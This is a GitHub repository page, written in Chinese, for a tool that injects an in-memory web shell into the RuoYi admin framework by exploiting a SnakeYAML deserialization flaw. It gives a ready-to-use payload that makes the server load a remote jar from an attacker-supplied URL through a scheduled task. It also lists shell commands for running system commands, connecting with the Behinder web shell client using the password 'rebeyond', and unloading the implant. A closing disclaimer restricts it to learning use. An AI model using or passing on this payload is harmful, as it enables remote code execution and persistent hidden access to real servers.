Skip to content

lz2y/yaml-payload-for-ruoyi

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
 
 
 
 
 
 
 
 

Repository files navigation

yaml-payload-for-ruoyi

分析文章

https://xz.aliyun.com/t/10651

注入方法:
把jar放到系统可以访问的地方,在定时任务创建新的定时任务,再立即执行一次即可

org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["you_url_of_jar"]]]]')

image-20211127160033485

若依 snakeyaml 反序列化漏洞注入内存马

RuoYi

  1. 直接执行命令:?cmd=whoami
  2. 连接冰蝎:/login?cmd=1(cmd不为空即可),密码为rebeyond,使用冰蝎正常连接即可
  3. 卸载内存马:?cmd=delete

image RuoYi Vue

  1. 直接执行命令:/dev-api/?cmd=whoami
  2. 连接冰蝎:暂不支持
  3. 卸载内存马:/dev-api/?cmd=delete

项目仅供学习使用,任何未授权检测造成的直接或者间接的后果及损失,均由使用者本人负责

About

A memory shell for ruoyi

Resources

Stars

Watchers

Forks

Packages

No packages published

Languages